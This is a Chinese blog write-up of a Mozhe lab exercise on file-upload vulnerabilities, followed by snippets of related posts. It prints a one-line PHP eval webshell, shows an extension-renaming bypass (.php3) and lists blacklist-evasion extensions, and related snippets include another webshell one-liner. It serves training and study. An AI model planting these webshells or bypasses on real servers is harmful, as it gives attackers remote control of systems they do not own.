墨者 - WebShell文件上传漏洞分析溯源(第1题)

最新推荐文章于 2024-05-25 19:27:31 发布
最新推荐文章于 2024-05-25 19:27:31 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/94331048
版权

 

 

直接上传 php文件

 

无法通过校验

 

在网上搜索资料后发现,在php/5.x.x中,后缀名为php3、php4、php5的文件都可以解析为php文件,于是试着将后缀名为php3

 

居然成功了

 

使用一句话木马

<?php eval(@$_POST['a']); ?>

 

菜刀无惧链接,拿到key

 

 

思路拓展:

黑名单校验(一般有个专门的 blacklist 文件,里面会包含常见的危险脚本文件)


绕过方法:

1.找黑名单扩展名的漏网之鱼 - 比如 asa 和 cer 之类
2.可能存在大小写绕过漏洞 - 比如 aSp 和 pHp 之类

能被解析的文件扩展名列表:
jsp jspx jspf
asp asa cer aspx
php phtml php3 php4 php5 pwml
exe exee

 

 

吃肉唐僧
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2
qq_43233085的博客
01-16 839
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2目背景介绍实训目标解方向解步骤 目 背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞。 实训目标 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法...
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第1
qq_43233085的博客
01-15 987
墨者靶场 入门:WebShell文件上传漏洞分析溯源 第1目背景介绍实训目标解方向解步骤 目 背景介绍 某公司内部资料分享平台存在一个文件上传页面,为了保证服务器的安全,现在安全工程师“墨者”将对该上传页面进行安全检测,看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHP及PHP5各个版本的相关知识; 2、了解PHP上传绕过扩展名的方法; 3、了解Burpsuite的使用方...
360众测靶场库之87- WebShell文件上传漏洞分析溯源(第1)
zjl12344的博客
03-13 230
360众测靶场
ruoyi漏洞poc汇总及其原理分析(源码分析
问彡心的博客
05-25 2415
汇总网上常见的若依漏洞poc,根据不同版本的参照对比,分析每个漏洞在不同版本中的代码表现形式,学习这些漏洞后台的代码是如何编写的以及如何进行修复的
墨者学院-WebShell文件上传漏洞分析溯源(第1)
JimWu的博客
09-05 754
WebShell文件上传漏洞分析溯源(第1) 难易程度:★ 目类型:文件上传 使用工具:FireFox浏览器、burpsuite、菜刀 1.打开靶场,需要上传文件。 2.首先编写一句话木马。 3.上传试一试能否成功,发现是上传失败的。 4.再次尝试一下把php文件的后缀修改为php5。 有两种方法修改后缀: ①使用burpsuite抓包修改后缀名为php5。 ②手动把文件后缀名修改为php...
WebShell文件上传漏洞分析溯源(第1)
zdzzdz123123的博客
08-27 400
方法一、后缀名绕过 先上传一个正常的文件 成功上传并回显路径 之后F12查看网络信息,可以看到网站架构为PHP+Apache2.4.7 直接上传phpwebshell 将后缀修改为php3 文件成功上传,之后蚁剑连接 方法二、.htaccess 上传一个.htaccess文件 文件内容为SetHandler application/x-httpd-php 意为将文件夹中的内容全都当作php文件来解析 之后上传一个图片格式的phpinfo 之后访问phpinfo图片 phpinfo被成功编译
Web安全-文件上传漏洞(常见上传解析漏洞,常见检测方式绕过)
m0_74220316的博客
07-04 2273
Webshell是一种利用Web服务器的漏洞或弱点,通过远程上传恶意代码到服务器上(实质上是一种网页后门),并执行命令或控制服务器的一种攻击方式。在上传过后,该文件与网站服务器web目录下的正常网页文件混在一起,然后就可以通过该文件得到一个命令执行环境攻击者可以通过Webshell获取服务器的高权限,进而进行非法操作,例如修改服务器文件、数据库操作、执行系统命令等。Webshell具有隐蔽性高、操作方便等特点,常被用于非法攻击、入侵行为或用于进行系统安全评估和渗透测试。
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
WebShell文件上传漏洞分析溯源(第3)
02-22
WebShell文件上传漏洞 修改代码
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者学院 - WebShell文件上传漏洞分析溯源(第5)
多崎巡礼的博客
08-14 1715
弱口令 admin admin 进入后台 添加文章-上传asp一句话木马的图片马,记住返回的路径 当前数据库路径更改为上传一句话木马后返回的路径 备份数据库名称填写后缀为asp的文件名 菜刀链接即可   不能理解为什么数据库名是路径到文件,按理说应该是一个只到文件夹的路径才对。。。 言而总之,就是备份数据可以将文件重命名          ...
墨者学院 - WebShell文件上传分析溯源(第1)
多崎巡礼的博客
08-29 1030
墨者学院 - WebShell文件上传漏洞分析溯源(第5) 一模一样啊,,, https://blog.csdn.net/qq_42357070/article/details/81665014 。。。
墨者学院WebShell文件上传漏洞分析溯源
gudugeji的博客
10-22 370
1.第一 编写一句话木马,然后上传文件,改文件不可上传,改后缀为php5 然后用菜刀连接 连接成功打开html,得到flag 2.第二 上传shell图片,burp抓包,改jpg为php,点Forward,然后菜刀连接,同1 ...
墨者学院 - WebShell代码分析溯源(第1)
多崎巡礼的博客
07-27 1245
下载源码 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg     下载出源代码,找到cn-right.php   &lt;?php error_reporting(0); $_GET['POST']($_POST['GET']); ?&gt; ...
文件上传漏洞(一句话木马)-学习笔记
热门推荐
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
墨者学院】WebShell文件上传漏洞分析溯源(第3)
m0_66835614的博客
11-28 863
墨者学院】WebShell文件上传漏洞分析溯源(第3)
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值